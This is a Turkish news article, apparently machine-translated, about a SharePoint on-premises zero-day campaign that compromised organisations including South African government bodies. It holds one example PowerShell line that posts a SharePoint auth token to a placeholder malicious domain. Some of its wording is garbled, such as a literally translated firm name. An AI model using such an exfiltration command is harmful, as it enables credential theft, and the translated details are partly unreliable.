Microsoft SharePoint sunucularında sıfır günlük bir kırılganlıktan yararlanan sofistike bir siber saldırı, küresel olarak 400’den fazla varlığı tehlikeye attı ve Güney Afrika ve Mauritius da dahil olmak üzere Afrika ülkeleri arasında önemli bir etkiye sahipti.
Saldırı, özellikle şirket içi SharePoint kurulumlarını hedefliyor ve tehdit aktörlerinin devlet kurumlarına, eğitim kurumlarına ve özel şirketlere ait kritik altyapı sistemlerine sızmasına izin veren daha önce bilinmeyen güvenlik kusurlarından yararlanıyor.
Kötü amaçlı yazılım kampanyası, geçen hafta Hollanda siber güvenlik firması göz güvenliğinin ilk ihlal dalgasını tespit ettiği zaman ortaya çıktı.
Bulut barındıran örnekleri etkileyen tipik SharePoint güvenlik açıklarından farklı olarak, bu sıfır günü özellikle SharePoint sunucularını kendi altyapılarında çalıştıran kuruluşları hedefler-birçok kurumun gelişmiş kontrol ve güvenlik için tercih ettiği bir yapılandırma.
Saldırı vektörü, SharePoint’in Belge İşbirliği Çerçevesi’ndeki yetkisiz kod yürütme özelliklerinden yararlanır ve saldırganların hedeflenen ağlara kalıcı erişim sağlamasını sağlar.
Business Insider Afrika analistleri, kötü amaçlı yazılımların sofistike davranış kalıplarını belirledi ve tehlikeye atılan sistemlerden duyarlı verileri püskürtürken tespit edilmeme yeteneğine dikkat çekti.
Yalnızca Güney Afrika’da kurbanlar, büyük bir otomotiv üreticisi, çeşitli üniversite, yerel yönetim kuruluşları ve Ulusal Hazine dahil olmak üzere birçok sektöre yayılmıştır.
Enfeksiyon mekanizması ve teknik analiz
SharePoint Zero-Day, sunucunun kimlik doğrulama mekanizmasındaki uzaktan kod yürütme güvenlik açığından yararlanarak saldırganların standart güvenlik kontrollerini atlamasına izin verir.
Teknik analiz, kötü amaçlı yazılımın çok aşamalı bir yük dağıtım sistemi kullandığını ortaya koyuyor:-
# Example of potential exploitation vector
Invoke-WebRequest -Uri "http://malicious-domain/payload.aspx"
-Method POST -Body $sharepoint_auth_tokenSaldırı, savunmasız sürümleri çalıştıran SharePoint çiftliklerini hedefleyen keşif taramalarıyla başlar ve ardından kötü niyetli web kabukları enjekte etmek için kimlik doğrulama bypass’ın kullanılması.
Microsoft, güvenlik açığının yalnızca şirket içi kurulumları etkilediğini doğruladı, bulutta barındırılan SharePoint çevrimiçi hizmetleri Microsoft’un yönetilen güvenlik altyapısı aracılığıyla güvenli kaldı.
Entegre etmek Herhangi biri. Gelişmiş tehditleri analiz etmek için siem veya soar ile -> 50 ücretsiz deneme aramasını deneyin